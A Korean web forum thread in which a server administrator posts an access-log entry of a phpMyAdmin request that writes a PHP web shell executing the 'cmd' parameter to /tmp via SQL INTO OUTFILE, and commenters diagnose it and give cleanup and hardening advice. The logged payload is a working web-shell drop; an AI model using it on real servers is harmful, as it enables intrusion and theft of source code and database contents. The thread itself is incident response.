112.219.92.82 - - [24/Mar/2012:01:01:42 +0900] "GET /phpmyadmin/main.php?reload=1&sql_query=select+%27%3C%3Fphp+echo+%5C%27%3Cpre%3E%5C%27%3Bsystem%28%24_GET%5B%5C%27cmd%5C%27%5D%29%3B+echo+%5C%27%3C%2Fpre%3E%5C%27%3B+%3F%3E%27+INTO+OUTFILE+%27%2Ftmp%2F.a%27&token=6447c5d6e0ef4ea9a5807a9cdf775021 HTTP/1.1" 200 7428 "도메인/util/phpmyadmin/server_sql.php?token=6447c5d6e0ef4ea9a5807a9cdf775021" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.26) Gecko/20120128 Firefox/3.6.26"
위와같이 웹로그가 다수 발견되었는데요
phpmyadmin 소스 파일을 웹에서 다운받을수 있게 리스트 보이게 해둿엇는데 그경로 뒤에 이런식으로 쿼리를 남겼네요.. 굵게 표시해놓은 .a 파일이 /tmp 디렉토리에서 발견되었구요..
인젝션이나 그런형태 인건가요?
아이피 변조해서 무수히 많은 로그가 생성되었습니다 ㅠㅠ
zh-CN이건 중국이라는거같기도 하고 ㅠㅠ 조언바랍니다 ㅠㅠ 일단 그경로의 파일은 삭제햇습니다 ㅠㅠ
댓글 3개
13년 전
음....정확한건 들어가서 봐야겠지만......phpmyadmin 기본 로그가 저런식으로 남다보니...
별다른 의심점은 /tmp 에 파일이 생겼다라는건데....폴더명을 phpmysadmin 이런식으로 쓰는건
위험하구요...조치는 잘 취하신것 처럼보이네욤...
파일 삭제와 더불어 경로변경 , phpmyadmin 버전업 정도 조치 하시면 될듯 한데욤
별다른 의심점은 /tmp 에 파일이 생겼다라는건데....폴더명을 phpmysadmin 이런식으로 쓰는건
위험하구요...조치는 잘 취하신것 처럼보이네욤...
파일 삭제와 더불어 경로변경 , phpmyadmin 버전업 정도 조치 하시면 될듯 한데욤
xkingcode
13년 전
웹셀 업로드 맞네요. PHP로 보내는 명령을 바로 실행하는 PHP 파일을 만든겁니다.
일단 서버내에 파일은 다 털어갈 수 있는 상황이 되었고요.
(소스, db접속 계정 정보, DB 내용)
우선 기본적으로 비밀번호 변경하시고요.
가능한 업데이트 다 해주시고요.
웹셀 이후에 권한 탈취 시도까지는 없었던 것 같습니다만
좀비 PC 가능성도 높으니
ps aux 에서 이상한 프로세스 있으면 삭제해주세요
neststat -a 해서 정체모를 IP로부터 명령 받고있는건 없는지 확인하시고요.
phpmyadmin 경로 변경해서 다른 곳에서 쓰시고
phpmyadmin 최신 버전으로 다시 받으시고요.
MySQL은 해당 서버에서만 접근할 수 있게 IP제한 걸어주시고
PHPMyadmin도 IP 제한 걸면 좋고요.
가능하면 방화벽으로 오픈해야 하는 서비스만 오픈하심이 좋아보이십니다.
일단 서버내에 파일은 다 털어갈 수 있는 상황이 되었고요.
(소스, db접속 계정 정보, DB 내용)
우선 기본적으로 비밀번호 변경하시고요.
가능한 업데이트 다 해주시고요.
웹셀 이후에 권한 탈취 시도까지는 없었던 것 같습니다만
좀비 PC 가능성도 높으니
ps aux 에서 이상한 프로세스 있으면 삭제해주세요
neststat -a 해서 정체모를 IP로부터 명령 받고있는건 없는지 확인하시고요.
phpmyadmin 경로 변경해서 다른 곳에서 쓰시고
phpmyadmin 최신 버전으로 다시 받으시고요.
MySQL은 해당 서버에서만 접근할 수 있게 IP제한 걸어주시고
PHPMyadmin도 IP 제한 걸면 좋고요.
가능하면 방화벽으로 오픈해야 하는 서비스만 오픈하심이 좋아보이십니다.
13년 전
phpmyadmin 최신 버전으로 사용하는게 좋겠네요.
phpmyadmin 트래픽 공격도 발생하더군요.
phpmyadmin 트래픽 공격도 발생하더군요.
게시판 목록
프로그램
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 5330 | 13년 전 | 759 | ||
| 5329 | 13년 전 | 698 | ||
| 5328 | 13년 전 | 636 | ||
| 5327 | 13년 전 | 879 | ||
| 5326 |
downmix
|
13년 전 | 1116 | |
| 5325 |
techer
|
13년 전 | 3139 | |
| 5324 |
techer
|
13년 전 | 963 | |
| 5323 | 13년 전 | 1174 | ||
| 5322 |
김준수사랑
|
13년 전 | 889 | |
| 5321 |
다케미카코
|
13년 전 | 749 | |
| 5320 |
|
13년 전 | 994 | |
| 5319 |
한번잘해보자
|
13년 전 | 1000 | |
| 5318 |
|
13년 전 | 1264 | |
| 5317 |
techer
|
13년 전 | 2698 | |
| 5316 |
techer
|
13년 전 | 3140 | |
| 5315 | 13년 전 | 1170 | ||
| 5314 |
티즈코리아
|
13년 전 | 1226 | |
| 5313 | 13년 전 | 697 | ||
| 5312 |
|
13년 전 | 1865 | |
| 5311 |
innis
|
13년 전 | 761 | |
| 5310 | 13년 전 | 851 | ||
| 5309 |
changho
|
13년 전 | 659 | |
| 5308 |
|
13년 전 | 1361 | |
| 5307 |
|
13년 전 | 791 | |
| 5306 | 13년 전 | 1159 | ||
| 5305 |
세상속으로
|
13년 전 | 1148 | |
| 5304 | 13년 전 | 657 | ||
| 5303 | 13년 전 | 2237 | ||
| 5302 | 13년 전 | 1385 | ||
| 5301 | 13년 전 | 1104 | ||
| 5300 |
프로프리랜서
|
13년 전 | 1075 | |
| 5299 | 13년 전 | 858 | ||
| 5298 | 13년 전 | 674 | ||
| 5297 |
나랑사귈래
|
13년 전 | 608 | |
| 5296 | 13년 전 | 1336 | ||
| 5295 | 13년 전 | 1118 | ||
| 5294 | 13년 전 | 728 | ||
| 5293 |
|
13년 전 | 5820 | |
| 5292 |
|
13년 전 | 792 | |
| 5291 | 13년 전 | 613 | ||
| 5290 | 13년 전 | 553 | ||
| 5289 | 13년 전 | 651 | ||
| 5288 | 13년 전 | 1163 | ||
| 5287 | 13년 전 | 758 | ||
| 5286 | 13년 전 | 967 | ||
| 5285 | 13년 전 | 1323 | ||
| 5284 |
미스홍당무
|
13년 전 | 853 | |
| 5283 |
basketball
|
13년 전 | 1745 | |
| 5282 | 13년 전 | 783 | ||
| 5281 |
|
13년 전 | 793 | |
| 5280 | 13년 전 | 1207 | ||
| 5279 | 13년 전 | 1374 | ||
| 5278 |
크라이스트
|
13년 전 | 2045 | |
| 5277 |
|
13년 전 | 731 | |
| 5276 |
그누보드환자이송
|
13년 전 | 788 | |
| 5275 | 13년 전 | 703 | ||
| 5274 | 13년 전 | 1372 | ||
| 5273 | 13년 전 | 2004 | ||
| 5272 | 13년 전 | 1119 | ||
| 5271 | 13년 전 | 1434 | ||
| 5270 | 13년 전 | 808 | ||
| 5269 | 13년 전 | 521 | ||
| 5268 | 13년 전 | 643 | ||
| 5267 | 13년 전 | 1180 | ||
| 5266 | 13년 전 | 1838 | ||
| 5265 | 13년 전 | 1608 | ||
| 5264 |
크라이스트
|
13년 전 | 1197 | |
| 5263 |
|
13년 전 | 1263 | |
| 5262 |
제이티37
|
13년 전 | 583 | |
| 5261 |
|
13년 전 | 776 | |
| 5260 |
quenya
|
13년 전 | 2068 | |
| 5259 | 13년 전 | 705 | ||
| 5258 | 13년 전 | 725 | ||
| 5257 |
크라이스트
|
13년 전 | 4592 | |
| 5256 | 13년 전 | 1249 | ||
| 5255 | 13년 전 | 3252 | ||
| 5254 |
|
13년 전 | 703 | |
| 5253 | 13년 전 | 768 | ||
| 5252 | 13년 전 | 766 | ||
| 5251 | 13년 전 | 713 | ||
| 5250 |
dudn1114
|
13년 전 | 1291 | |
| 5249 | 13년 전 | 666 | ||
| 5248 | 13년 전 | 737 | ||
| 5247 | 13년 전 | 2077 | ||
| 5246 | 13년 전 | 501 | ||
| 5245 | 13년 전 | 2190 | ||
| 5244 | 13년 전 | 1450 | ||
| 5243 |
|
13년 전 | 971 | |
| 5242 | 13년 전 | 769 | ||
| 5241 | 13년 전 | 1849 | ||
| 5240 |
|
13년 전 | 505 | |
| 5239 | 13년 전 | 1034 | ||
| 5238 | 13년 전 | 1221 | ||
| 5237 | 13년 전 | 1115 | ||
| 5236 | 13년 전 | 582 | ||
| 5235 |
|
13년 전 | 759 | |
| 5234 |
뭐먹고살지ㅠ
|
13년 전 | 1030 | |
| 5233 | 13년 전 | 3597 | ||
| 5232 | 13년 전 | 3137 | ||
| 5231 | 13년 전 | 3727 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기